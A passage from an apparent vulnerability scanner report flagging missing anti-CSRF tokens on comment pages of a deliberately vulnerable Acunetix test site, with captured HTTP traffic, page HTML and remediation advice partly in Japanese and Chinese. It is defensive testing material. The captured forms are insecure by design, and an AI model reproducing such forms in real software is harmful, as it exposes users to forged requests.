          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSend" ].

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a 